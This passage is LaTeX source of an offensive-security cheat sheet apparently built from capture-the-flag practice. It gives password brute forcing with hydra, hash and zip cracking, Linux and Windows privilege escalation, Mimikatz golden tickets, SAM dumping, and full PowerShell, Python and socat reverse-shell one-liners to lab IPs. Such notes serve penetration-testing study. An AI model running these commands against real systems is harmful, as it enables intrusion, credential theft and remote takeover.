\begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Linux Commands (cont)}} \tn % Row 5 \SetRowColor{LightBackground} Gobuster (dir buster) & \{\{fa-bolt\}\} gobuster dir -u \seqsplit{http://10.10.203.157:3333/} -w \seqsplit{/usr/share/wordlists/dirb/common}.txt \{\{nobreak\}\} \tn % Row Count 6 (+ 6) % Row 6 \SetRowColor{white} Processes running (under which user) & ps aux \tn % Row Count 8 (+ 2) % Row 7 \SetRowColor{LightBackground} SUID (set owner userId upon execution) binary & find / -perm -u=s -type f 2\textgreater{}/dev/null \{\{nl\}\} Instead of rwx -\textgreater{} rws. Example - the suid bit is set on binary file password as other user should be able to change their password but the user wont have direct access to that file \{\{nl\}\} So it has root privileges \tn % Row Count 21 (+ 13) % Row 8 \SetRowColor{white} Burp Suite (check acceptable file ext) & By sending request to Intruder and then spider attack \{\{fa-bolt\}\} Check response length to verify if the extension is acceptable or not \{\{nl\}\} Python script by importing request library can also be used \tn % Row Count 32 (+ 11) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Linux Commands (cont)}} \tn % Row 9 \SetRowColor{LightBackground} Word count (count the no of lines in a file) & wc -l yourTextFile \tn % Row Count 3 (+ 3) % Row 10 \SetRowColor{white} Whatweb & whatweb \textless{}ip\textgreater{} \{\{nl\}\} The WhatWeb tool is used to identify different web technologies used by the website. \tn % Row Count 9 (+ 6) % Row 11 \SetRowColor{LightBackground} Fim (view images from terminal) & fim \textless{}image\_name) \tn % Row Count 11 (+ 2) % Row 12 \SetRowColor{white} Curl (change user agent (browser type render content) and follow redirection) & curl -A "J" -L \seqsplit{"http://10.10.231.116"} \tn % Row Count 15 (+ 4) % Row 13 \SetRowColor{LightBackground} Python server to transfer files from remote to local & python3 -m http.server \textless{}port\_no\textgreater{} and access using the ip of remote machine:port no \tn % Row Count 20 (+ 5) % Row 14 \SetRowColor{white} Python server to transfer files from local to remote & wget http://\textless{}ur-ip\textgreater{}:\textless{}port\textgreater{}/\textless{}file\textgreater{} \tn % Row Count 23 (+ 3) % Row 15 \SetRowColor{LightBackground} Extract zip & 7z e \textless{}zip\_name.zip\textgreater{} \tn % Row Count 24 (+ 1) % Row 16 \SetRowColor{white} Crack Zip & locate zip2john \{\{nl\}\} zip2john \textless{}zipfile\textgreater{} \textgreater{} output.txt \{\{nl\}\} john output.txt \{\{nl\}\} fcrackzip -u backups.zip -D -p \seqsplit{/usr/share/wordlists/rockyou}.txt -v \tn % Row Count 32 (+ 8) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Linux Commands (cont)}} \tn % Row 17 \SetRowColor{LightBackground} Move multiple to directory & mv file1 file2 folder\_name \tn % Row Count 2 (+ 2) % Row 18 \SetRowColor{white} Fuzz directory & wfuzz -c -w common.txt -{}-sc 200 -u \seqsplit{"http://10.10.10.191/FUZZ.txt"} -t 100 \{\{nl\}\} wfuzz -z file,big.txt -d "breed=FUZZ" -u \seqsplit{http://shibes.xyz/api.php} \tn % Row Count 10 (+ 8) % Row 19 \SetRowColor{LightBackground} Find flags .txt & find / -type f -name 'user.txt' 2\textgreater{}/dev/null \tn % Row Count 13 (+ 3) % Row 20 \SetRowColor{white} Hydra (brute force http post form) & hydra -L usernames.txt -P passwords.txt 192.168.2.62 http-post-form "/dvwa/login.php:username=\textasciicircum{}USER\textasciicircum{}\&password=\textasciicircum{}PASS\textasciicircum{}\&Login=Login:Login Failed" \{\{nl\}\} \{\{fa-bolt\}\} Specify the error at login failed \tn % Row Count 23 (+ 10) % Row 21 \SetRowColor{LightBackground} Hydra (brute force FTP) & hydra -l ftpuser -P passlist ftp://10.10.50.55 \tn % Row Count 26 (+ 3) % Row 22 \SetRowColor{white} FTP bruteforce & hydra -l chris -P \seqsplit{/usr/share/wordlists/rockyou}.txt -vV ftp://10.10.91.104 \tn % Row Count 30 (+ 4) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Linux Commands (cont)}} \tn % Row 23 \SetRowColor{LightBackground} POP3 bruteforce & \{\{fa-bolt\}\} hydra -l "boris" -P \seqsplit{/usr/share/wordlists/fasttrack}.txt -f 10.10.186.225 -s 55007 pop3 -V \tn % Row Count 5 (+ 5) % Row 24 \SetRowColor{white} John the ripper (crack ssh) VIA (private key pass bruteforce) & \{\{fa-bolt\}\} python \seqsplit{/usr/share/john/ssh2john}.py codes \textgreater{} crack.txt \{\{nl\}\} \{\{fa-bolt\}\} john -{}-wordlist=/root/Downloads/rockyou.txt crack.txt \tn % Row Count 12 (+ 7) % Row 25 \SetRowColor{LightBackground} ssh (login through private key) & \{\{fa-bolt\}\} ssh -i codes david@10.10.10.165 -p 22 \tn % Row Count 15 (+ 3) % Row 26 \SetRowColor{white} SSH bruteforce for password & \{\{fa-bolt\}\} hydra -f -l john -P list ssh://10.10.24.200 \tn % Row Count 18 (+ 3) % Row 27 \SetRowColor{LightBackground} Bruteforce JPG for hidden data (steghide pass) & \{\{fa-bolt\}\} stegcracker file list.txt \tn % Row Count 21 (+ 3) % Row 28 \SetRowColor{white} TELNET interacting with POP3 & \{\{fa-bolt\}\} Connect to the mail server using Telnet with the IP or DNS name of the server on port 110 \{\{nl\}\}\{\{fa-bolt\}\} \{\{link="https://www.vircom.com/blog/quick-guide-of-pop3-command-line-to-type-in-telnet/"\}\}TELNET commands\{\{/link\}\} \tn % Row Count 33 (+ 12) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Linux Commands (cont)}} \tn % Row 29 \SetRowColor{LightBackground} PNG magic number \& Hexedit & \{\{fa-bolt\}\} 89 50 4E 47 0D 0A 1A 0A \{\{nl\}\}\{\{fa-bolt\}\}hexedit \textless{}file\textgreater{} \{\{nl\}\}\{\{fa-bolt\}\} hexedit ctrl+x - to save \tn % Row Count 6 (+ 6) % Row 30 \SetRowColor{white} Mysql cheatsheet & \{\{fa-bolt\}\} \{\{link="http://g2pc1.bu.edu/\textasciitilde{}qzpeng/manual/MySQL\%20Commands.htm"\}\} MySQL Commands\{\{/link\}\} \{\{nl\}\} \{\{fa-bolt\}\} Use ; to terminate the mysql line \tn % Row Count 14 (+ 8) % Row 31 \SetRowColor{LightBackground} Find a specific file with readable permission & \{\{fa-bolt\}\} find / -type f -readable 2\textgreater{}/dev/null | grep README.txt \tn % Row Count 18 (+ 4) % Row 32 \SetRowColor{white} Sudo -l execution & \{\{fa-bolt\}\} (sly) /bin/cat \seqsplit{/home/sly/README.txt} \{\{nl\}\}\{\{fa-bolt\}\} sudo -u sly /bin/cat \seqsplit{/home/sly/README.txt} \{\{nl\}\}\{\{fa-bolt\}\} So you can see the user was able to execute that command. We have to use sudo specify \textless{}usr\textgreater{} \textless{}binary path\textgreater{} \textless{}file\textgreater{} to execute \tn % Row Count 31 (+ 13) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Linux Commands (cont)}} \tn % Row 33 \SetRowColor{LightBackground} Nmap scanning working & \{\{fa-bolt\}\} if u do this nmap -sC -sV -Pn ip, you can see result if u do specifically -p 1-100, it will show their info, because they all are open \tn % Row Count 8 (+ 8) % Row 34 \SetRowColor{white} To only grab banners & \{\{fa-bolt\}\} nmap -p 1-100 \textless{}IP\textgreater{} -{}-script banner \{\{nl\}\}\{\{fa-bolt\}\}Telnet is communication tool, it gets the banner or the protocol info like if its http, it shows http info, if it is ssh, it shows ssh rsa info \tn % Row Count 19 (+ 11) % Row 35 \SetRowColor{LightBackground} Escape shells via programming & \{\{fa-bolt\}\} \{\{link="https://jc01.ninja/ctf/privesc-playground/"\}\}Escaping shell via programming like ruby irb(main)\{\{/link\}\} \tn % Row Count 26 (+ 7) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\seqsplit{https://mzfr.github.io/linux-priv-esc} \newline \newline https://linuxize.com/post/how-to-use-linux-ftp-command-to-transfer-files/ \newline \newline https://www.hostingmanual.net/zipping-unzipping-files-unix/} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.68 cm} x{4.32 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{GTFOBins}} \tn % Row 0 \SetRowColor{LightBackground} Usage & Syntax \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Vim Text Editor & \seqsplit{https://gtfobins.github.io/gtfobins/vim/} \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} Service Exploitation & \{\{fa-bolt\}\} Exploiting any service which is running as root \{\{nl\}\}\{\{fa-bolt\}\} Also provide the file path to the service's executable \tn % Row Count 10 (+ 7) % Row 3 \SetRowColor{white} To exploit a service & Execute it for example \textless{}path\_to\_the\_service\textgreater{}-\textgreater{} \{\{nl\}\}\{\{fa-bolt\}\} /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service \{\{nl\}\}\{\{fa-bolt\}\} You can get this from GTFObins but need to find out path \tn % Row Count 20 (+ 10) % Row 4 \SetRowColor{LightBackground} /systemctl (suid but set) & \{\{fa-bolt\}\}service is an "high-level" command used for start, restart, stop and status services in different Unixes and Linuxes. \{\{nl\}\}\{\{fa-bolt\}\} Service is adequate for basic service management, while directly calling systemctl give greater control options. \{\{nl\}\}\{\{fa-bolt\}\} Our target system allows any logged in user to create a system service and run it as root! \tn % Row Count 38 (+ 18) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{3.68 cm} x{4.32 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{GTFOBins (cont)}} \tn % Row 5 \SetRowColor{LightBackground} Sudo -l & sudo -l show you what exact command you are authorized to use \tn % Row Count 3 (+ 3) % Row 6 \SetRowColor{white} (ALL, !root) NOPASSWD: /usr/bin/vi & The !root is a cve vulnerability which can be exploited through \{\{nl\}\}\{\{fa-bolt\}\} sudo -u\#-1 \textless{}path\_where\_user\_can\_execute\_sudo\_command\textgreater{} \tn % Row Count 10 (+ 7) % Row 7 \SetRowColor{LightBackground} If sudo - l specifies Vim & \{\{fa-bolt\}\} Use esc and then :! as we are going to type a system command and then we specify executable sh (:!sh) \tn % Row Count 16 (+ 6) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. \newline \newline The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows Enumeration}} \tn % Row 0 \SetRowColor{LightBackground} Command & Usage \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Biggest Enumeration Hint & \{\{fa-bolt\}\} his is going to sound like.im being disingenuous, but you need to learn how to figure things out. Each machine might require a tool you haven't even heard of yet, but you have to figure that part out. Knowing what and how to Google is arguably the most valuable skill. \tn % Row Count 15 (+ 14) % Row 2 \SetRowColor{LightBackground} Hint - Users & \{\{fa-bolt\}\} names are impotant! might be subdomain or read understand might be username passwd \tn % Row Count 20 (+ 5) % Row 3 \SetRowColor{white} Hint - Finding the right file & \{\{fa-bolt\}\} The service at the starting off the box can be later on checked for conf or file for username passwd \tn % Row Count 26 (+ 6) % Row 4 \SetRowColor{LightBackground} Github - working & \{\{fa-bolt\}\} Create branch \{\{fa-bolt\}\} Now push file into that branch \{\{fa-bolt\}\} Click on the uploaded file and PULL request \{\{fa-bolt\}\} Complete pull request is same as Commit \{\{fa-bolt\}\} Approve and Complete the Merge \tn % Row Count 37 (+ 11) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows Enumeration (cont)}} \tn % Row 5 \SetRowColor{LightBackground} Active Directory & \{\{fa-bolt\}\} TryHackMe Room \{\{fa-bolt\}\} A Windows Domain allows management of large computer networks \{\{fa-bolt\}\} They use a Windows server called a DC (domain controller) \{\{fa-bolt\}\} A DC is any server that has Active Directory domain services role \{\{fa-bolt\}\} DC respond to authentication requests across the domain \{\{fa-bolt\}\} DCs have the tool AD (active directory) and GP (group policy) \{\{fa-bolt\}\} AD contains objects and OUs (Organizational Units) \{\{fa-bolt\}\} GP contains GPOs (Group Policy objects) that manage settings for AD objects \tn % Row Count 28 (+ 28) % Row 6 \SetRowColor{white} Netbios port 137 & \{\{fa-bolt\}\} Hacktrick enumeration \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows Enumeration (cont)}} \tn % Row 7 \SetRowColor{LightBackground} SMB port 139 & \{\{fa-bolt\}\} smbclient -L \textless{}ip\textgreater{} - yields information such as sharename and its type \tn % Row Count 5 (+ 5) % Row 8 \SetRowColor{white} SVN PORT NO - 3690 and its simply Version Tracking With Subversion (SVN) & \{\{fa-bolt\}\} First view the log \{\{fa-bolt\}\} svn log svn://worker.htb/ \{\{nl\}\} \{\{fa-bolt\}\} Now you can view the difference between those commits \{\{fa-bolt\}\} svn diff svn://htb/ -r 2 \tn % Row Count 14 (+ 9) % Row 9 \SetRowColor{LightBackground} Subversion Commands & \seqsplit{http://www.yolinux.com/TUTORIALS/Subversion.html\#SVNPROPERTIES} \tn % Row Count 18 (+ 4) % Row 10 \SetRowColor{white} SVN & \{\{fa-bolt\}\} Subversion cannot find a proper .svn directory in there. \tn % Row Count 22 (+ 4) % Row 11 \SetRowColor{LightBackground} Reverse shells & \seqsplit{https://hackersinterview}.com/oscp/reverse-shell-one-liners-oscp-cheatsheet/ \tn % Row Count 26 (+ 4) % Row 12 \SetRowColor{white} Powershell reverse shell & powershell -nop -c "\$client = New-Object \seqsplit{System.Net.Sockets.TCPClient('192.168.1.2'},4444);\$stream = \$client.GetStream();{[}byte{[}{]}{]}\$bytes = 0..65535|\%\{0\};while((\$i = \seqsplit{\$stream.Read(\$bytes}, 0, \$bytes.Length)) -ne 0)\{;\$data = (New-Object -TypeName \seqsplit{System.Text.ASCIIEncoding).GetString(\$bytes},0, \$i);\$sendback = (iex \$data 2\textgreater{}\&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '\textgreater{} ';\$sendbyte = ({[}text.encoding{]}::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()\};\$client.Close()" \tn % Row Count 53 (+ 27) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows Enumeration (cont)}} \tn % Row 13 \SetRowColor{LightBackground} Windows interactive shell (ASPX Shell by LT) & \seqsplit{https://github.com/xl7dev/WebShell/blob/master/Aspx/ASPX\%20Shell.aspx} \tn % Row Count 4 (+ 4) % Row 14 \SetRowColor{white} Dumping passwords and hashes on windows & \{\{fa-bolt\}\} This most probably requires administrative permissions. Windows stores passwords in SAM - Security Account Manager. Passwords are stored differently depending on the operating system. \{\{nl\}\}\{\{fa-bolt\}\} There are 2 Authentication mechanism that produce 2 Hashes - LM LAN Manager (LM) and NT LAN Manager (NTLM) \textgreater{} VISTA. \{\{nl\}\}\{\{fa-bolt\}\} \tn % Row Count 22 (+ 18) % Row 15 \SetRowColor{LightBackground} Credential Dumping: SAM (tools) & \{\{fa-bolt\}\} The Security Accounts Manager (SAM) is a registry file in Windows NT and later versions until the most recent Windows 8. It stores users' passwords in a hashed format (in LM hash and NTLM hash). Since a hash function is one-way, this provides some measure of security for the storage of the passwords. \{\{nl\}\}\{\{fa-bolt\}\} SAM is found in C:\textbackslash{}Windows\textbackslash{}System32\textbackslash{}config and passwords that are hashed and saved in SAM can found in the registry, just open the Registry Editor and navigate yourself to HKEY\_LOCAL\_MACHINE\textbackslash{}SAM. \{\{nl\}\}\{\{fa-bolt\}\} Windows 7 - SamDump2, PwDump7, Metasploit framework \{\{nl\}\}\{\{fa-bolt\}\} Windows 10 - Mimikatz, Impacket, Metasploit Framework - Hashdump and \seqsplit{load\_kiwi(mimikatz)} \{\{nl\}\}\{\{fa-bolt\}\} The Registry is essentially a database. Its information is stored on disk for the most part, though dynamic information also exists in the computer's memory \tn % Row Count 67 (+ 45) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows Priv. Esc. || Metasploit Module}} \tn % Row 0 \SetRowColor{LightBackground} Name & Usage \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Microsoft Remote Desktop (MSRDP) & Port no - 3389 \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} Local Security Authority Subsystem Service & \{\{fa-bolt\}\} lsass service \{\{nl\}\}\{\{fa-bolt\}\} The service responsible for authentication within Windows. \{\{nl\}\}\{\{fa-bolt\}\} We generally infect a process with the migrate command in metasploit to infect a process that can communicate with lsass.exe and has permissions that are needed to interact \tn % Row Count 18 (+ 15) % Row 3 \SetRowColor{white} To exploit lsass we need to be \{\{fa-bolt\}\}Same architecture (living in) \{\{fa-bolt\}\} Same permissions & \{\{fa-bolt\}\}In order to interact with lsass we need to be 'living in' a process that is the same architecture as the lsass service (x64 in the case of this machine) and a process that has the same permissions as lsass. \tn % Row Count 29 (+ 11) % Row 4 \SetRowColor{LightBackground} Printer service & \{\{fa-bolt\}\}spoolsv.exe \{\{nl\}\}\{\{fa-bolt\}\} The printer spool service \tn % Row Count 33 (+ 4) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows Priv. Esc. || Metasploit Module (cont)}} \tn % Row 5 \SetRowColor{LightBackground} Living in as a process & \{\{fa-bolt\}\} Often when we take over a running program we ultimately load another shared library into the program (a dll) which includes our malicious code. From this, we can spawn a new thread that hosts our shell. \tn % Row Count 11 (+ 11) % Row 6 \SetRowColor{white} msfconsole \textgreater{}\textgreater{} search \textless{}Program/Process\textgreater{} & Fire up msfconsole terminal and search for vulnerable exploit of a program or process \tn % Row Count 16 (+ 5) % Row 7 \SetRowColor{LightBackground} Select a exploit & \{\{fa-bolt\}\} Select using \#use \textless{}no\textgreater{}\{\{fa-bolt\}\} Remeber to use \#search options command and set them accordingly \tn % Row Count 22 (+ 6) % Row 8 \SetRowColor{white} Fire the exploit & \{\{fa-bolt\}\}\#run them after setting up options \tn % Row Count 25 (+ 3) % Row 9 \SetRowColor{LightBackground} Metasploit command center & \{\{fa-bolt\}\}\#getuid (user-id)\{\{fa-bolt\}\}\#sysinfo \{\{fa-bolt\}\}\#getprivs \{\{fa-bolt\}\}\#migrate -N PROCESS\_NAME \tn % Row Count 31 (+ 6) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows Priv. Esc. || Metasploit Module (cont)}} \tn % Row 10 \SetRowColor{LightBackground} Local\_exploit V/S Remote\_exploit & \{\{fa-bolt\}\} A remote exploit works over a network and exploits the security vulnerability without any prior access to the vulnerable system. A local exploit requires prior access to the vulnerable system and usually increases the privileges of the person running the exploit past those granted by the system administrator. \tn % Row Count 17 (+ 17) % Row 11 \SetRowColor{white} Local\_exploit (metasploit) & \{\{fa-bolt\}\}run \seqsplit{post/multi/recon/local\_exploit\_suggester} \{\{nl\}\}\{\{fa-bolt\}\} Results for potential escalation exploits. \{\{nl\}\}\{\{fa-bolt\}\} Local exploits require a session to be selected \tn % Row Count 27 (+ 10) % Row 12 \SetRowColor{LightBackground} Background a session (some priviledge) & \{\{fa-bolt\}\}\#background \{\{nl\}\}\{\{fa-bolt\}\} This provides us with a session number which can be used in combination with another exploit to escalate priviledges \tn % Row Count 35 (+ 8) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows Priv. Esc. || Metasploit Module (cont)}} \tn % Row 13 \SetRowColor{LightBackground} Mimikatz (password dumping tool) & \{\{fa-bolt\}\}\#load kiwi (Kiwi is the updated version of Mimikatz) `load kiwi` (Kiwi is the updated version of Mimikatz) \{\{nl\}\}\{\{fa-bolt\}\} Expanded the options use \#help to view them \tn % Row Count 9 (+ 9) % Row 14 \SetRowColor{white} Mimikatz allows us to create what's called a `golden ticket`, allowing us to authenticate anywhere with ease. & \{\{fa-bolt\}\}golden\_ticket\_create \{\{nl\}\}\{\{fa-bolt\}\}Golden ticket attacks are a function within Mimikatz which abuses a component to Kerberos (the authentication system in Windows domains), the ticket-granting ticket. In short, golden ticket attacks allow us to maintain persistence and authenticate as any user on the domain. \tn % Row Count 26 (+ 17) % Row 15 \SetRowColor{LightBackground} Windows NTLM hash crack & hashcat -a 0 -m 1000 crack.hash \seqsplit{/usr/share/wordlists/rockyou}.txt \tn % Row Count 30 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Privilege escalation}} \tn % Row 0 \SetRowColor{LightBackground} Usage & Syntax \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Fast Linux Priv. Esc Checklist & \{\{fa-bolt\}\} uname - a \{\{fa-bolt\}\} id \{\{fa-bolt\}\} sudo - l \{\{fa-bolt\}\} etc/crontab \{\{fa-bolt\}\} suid \{\{fa-bolt\}\} linpeas \{\{fa-bolt\}\} \seqsplit{linux-exploit-suggestor} \{\{fa-bolt\}\} pspy \{\{fa-bolt\}\} netstat \{\{fa-bolt\}\} capabilities \{\{fa-bolt\}\} search dir for juice \{\{fa-bolt\}\} use ps -aux | grep root to look at any services that are running as root. \{\{nl\}\} \{\{fa-bolt\}\} Password Spray \{\{fa-bolt\}\} Config files of service running might leak creds \tn % Row Count 23 (+ 22) % Row 2 \SetRowColor{LightBackground} C program & make \textless{}.c program\textgreater{} then ./ to execute \tn % Row Count 25 (+ 2) % Row 3 \SetRowColor{white} SCP (secure copy files) from local to remote machine & scp \textless{}filename\textgreater{} username@ip:\textless{}location\textgreater{} \tn % Row Count 28 (+ 3) % Row 4 \SetRowColor{LightBackground} Python server & \{\{fa-bolt\}\} python3 -m http.server \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Privilege escalation (cont)}} \tn % Row 5 \SetRowColor{LightBackground} Unix info about your specific Linux distribution & \{\{fa-bolt\}\} lsb\_release -a \{\{fa-bolt\}\} uname -a \tn % Row Count 3 (+ 3) % Row 6 \SetRowColor{white} Use echo " text " into file & \{\{fa-bolt\}\} echo "text" \textgreater{} output.txt \tn % Row Count 5 (+ 2) % Row 7 \SetRowColor{LightBackground} Python reverse shell with newline char & \{\{fa-bolt\}\} python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(("10.10.14.157",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call({[}"/bin/sh","-i"{]});' \tn % Row Count 17 (+ 12) % Row 8 \SetRowColor{white} View Cronjobs & \{\{fa-bolt\}\} cat /etc/crontabs \tn % Row Count 19 (+ 2) % Row 9 \SetRowColor{LightBackground} Exploiting sudo -l user NOPASSWD: ALL & \{\{fa-bolt\}\} sudo -i -u \textless{}user\textgreater{} \tn % Row Count 21 (+ 2) % Row 10 \SetRowColor{white} Sudo knowledge & \{\{fa-bolt\}\} su asks for the password of the user "root". \{\{nl\}\}\{\{fa-bolt\}\} sudo asks for your own password (and also checks if you're allowed to run commands as root, which is configured through /etc/sudoers -{}- by default all user accounts that belong to the "admin" or "sudo" groups are allowed to use sudo). \{\{nl\}\}\{\{fa-bolt\}\} sudo -s launches a shell as root, but doesn't change your working directory. sudo -i simulates a login into the root account: your working directory will be /root, and root's .profile etc. will be sourced as if on login. \tn % Row Count 49 (+ 28) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Privilege escalation (cont)}} \tn % Row 11 \SetRowColor{LightBackground} Sudo -l (exploiting sudo rights) & \{\{fa-bolt\}\} Super User Do root privilege task \{\{nl\}\}\{\{fa-bolt\}\} \seqsplit{https://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights/} \tn % Row Count 8 (+ 8) % Row 12 \SetRowColor{white} After SSH & \{\{fa-linux\}\} \tn % Row Count 9 (+ 1) % Row 13 \SetRowColor{LightBackground} id & \{\{fa-bolt\}\} id command in Linux is used to find out user and group names and numeric ID's (UID or group ID) of the current user or any other user in the server \tn % Row Count 17 (+ 8) % Row 14 \SetRowColor{white} id shows 108(lxd) & \{\{fa-bolt\}\} \{\{link="https://www.hackingarticles.in/lxd-privilege-escalation/"\}\} LXD privilege escalation\{\{/link\}\} \tn % Row Count 23 (+ 6) % Row 15 \SetRowColor{LightBackground} Weak File Permission & ls -l \textless{}file\textgreater{} : Check Permissions \tn % Row Count 25 (+ 2) % Row 16 \SetRowColor{white} Readable /etc/shadow & \{\{fa-bolt\}\} Crack the passwd, SHA-512 \tn % Row Count 27 (+ 2) % Row 17 \SetRowColor{LightBackground} Writeable /etc/shadow & \{\{fa-bolt\}\} Create and replace the passwd, mkpasswd -m sha-512 newpasswordhere \tn % Row Count 31 (+ 4) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Privilege escalation (cont)}} \tn % Row 18 \SetRowColor{LightBackground} Writeable /etc/passwd & \{\{fa-bolt\}\} Create and replace the passwd, openssl passwd newpasswordhere \tn % Row Count 4 (+ 4) % Row 19 \SetRowColor{white} \seqsplit{.sudo\_as\_admin\_successful} & \{\{fa-bolt\}\} Means that the user can run something as root \{\{nl\}\}\{\{fa-bolt\}\} Check SUID and Sudo -l \{\{fa-bolt\}\} Refer to checklist \tn % Row Count 11 (+ 7) % Row 20 \SetRowColor{LightBackground} Socat (more powerful version of nc) & \{\{fa-bolt\}\} We can use socat to send ourselves a root shell. \{\{nl\}\}\{\{fa-bolt\}\} Attacking machine: socat file:`tty`,raw,echo=0 tcp-listen:1234\{\{nl\}\}\{\{fa-bolt\}\} Remote machine: sudo socat tcp-connect:\textless{}your-ip-address\textgreater{}:1234 exec:bash,pty,stderr,setsid,sigint,sane \{\{nl\}\} \{\{fa-bolt\}\} \{\{link="https://www.maritimecybersecurity.center/linux-for-pentester-socat-privilege-escalation/"\}\} Socat Reverse shell as root \{\{/link\}\} \{\{nl\}\}\{\{fa-bolt\}\} \seqsplit{https://www.maritimecybersecurity.center/linux-for-pentester-socat-privilege-escalation/} \tn % Row Count 38 (+ 27) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Privilege escalation (cont)}} \tn % Row 21 \SetRowColor{LightBackground} Reverse shell (one-liners) & \{\{fa-bolt\}\} \{\{link="https://j-s-tymchuk.gitbook.io/penetration-testing-playbook/networking-and-shells/reverse-shells"\}\}Reverse shell - 1)Bash-running linux, 2)Python, 3)Nc, 4)PHP\{\{/link\}\} \{\{nl\}\}\{\{fa-bolt\}\} \{\{link="https://github.com/t0thkr1s/revshellgen"\}\}Reverse shell 